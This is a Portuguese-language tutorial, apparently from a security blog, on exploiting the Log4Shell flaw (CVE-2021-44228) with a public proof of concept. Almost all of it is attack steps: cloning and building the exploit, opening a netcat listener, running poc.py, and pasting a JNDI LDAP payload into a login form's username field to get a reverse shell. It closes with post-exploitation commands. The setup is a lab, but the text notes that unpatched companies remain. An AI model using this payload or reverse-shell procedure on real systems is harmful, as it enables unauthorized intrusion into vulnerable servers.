Log4J é uma biblioteca usada por desenvolvedores para fazer logging, um processo que permite guardar registros, envio de informações, processamento de dados e é através desta biblioteca que o sistema registra erros.
A vulnerabilidade (CVE-2021-44228) encontrada permite acesso ao servidor e ainda há empresa que não realizaram a correção, neste artigo você tem a possibilidade de explorar esta vulnerabilidade através de uma PoC.
Realize o clone do projeto log4j-shell-poc e liste o conteúdo do diretório.
Linuxgit clone https://github.com/kozmer/log4j-shell-poc cd log4j-shell-poc/ ls -l
Realize a instalação das dependências :
Linuxpip install -r requirements.txt
Realize o download do docker log4j-shell-poc :
Linuxdocker build -t log4j-shell-poc .
Realize o download do jdk1.8.0_20.zip, em seguida descompacte o arquivo.
Linuxwget https://www.100security.com.br/downloads/jdk1.8.0_20.zip unzip jdk1.8.0_20.zip
Na máquina do Atacante escute da porta 9000 :
Linuxnc -nlvp 9000
Inicie o docker :
Linuxdocker run --network host log4j-shell-poc
Atribua a permissão 777 no diretório jdk1.8.0_20
Execute o script poc.py.
Linuxpython3 poc.py --userip 192.168.0.100 --webport 8000 --lport 9000
Acesse o IP do servidor Alvo :
Navegadorhttp://192.168.0.110:8080
Copie a linha:
Linux${jndi:ldap://192.168.0.100:1389/a}
Cole a linha no campo do Username e clique em Login
A conexão reversa é estabelecida na máquina do Atacante 👍
Execute os comandos:
Linuxhostname whoami ls ls -l pwd